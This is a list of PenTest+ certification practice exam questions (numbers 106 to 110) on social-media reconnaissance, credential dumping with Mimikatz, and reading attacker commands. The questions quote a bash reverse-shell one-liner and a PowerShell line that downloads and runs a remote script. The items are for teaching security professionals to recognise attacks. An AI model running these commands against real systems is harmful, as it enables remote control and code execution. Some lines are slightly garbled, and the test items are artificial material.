PT0-001 Exam Question 106

A penetration tester is utilizing social media to gather information about employees at a company. The tester has created a list of popular words used in employee profile s. For which of the following types of attack would this information be used?
  • PT0-001 Exam Question 107

    Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?
  • PT0-001 Exam Question 108

    The following line was found in an exploited machine's history file. An attacker ran the following command:
    bash -i >& /dev/tcp/192.168.0.1/80 0> &1
    Which of the following describes what the command does?
  • PT0-001 Exam Question 109

    Consider the following PowerShell command:
    powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/ script.ps1");Invoke-Cmdlet Which of the following BEST describes the actions performed this command?
  • PT0-001 Exam Question 110

    A manager calls upon a tester to assist with diagnosing an issue within the following Python script:
    #!/usr/bin/python
    s = "Administrator"
    The tester suspects it is an issue with string slicing and manipulation Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment Options may be used once or not at all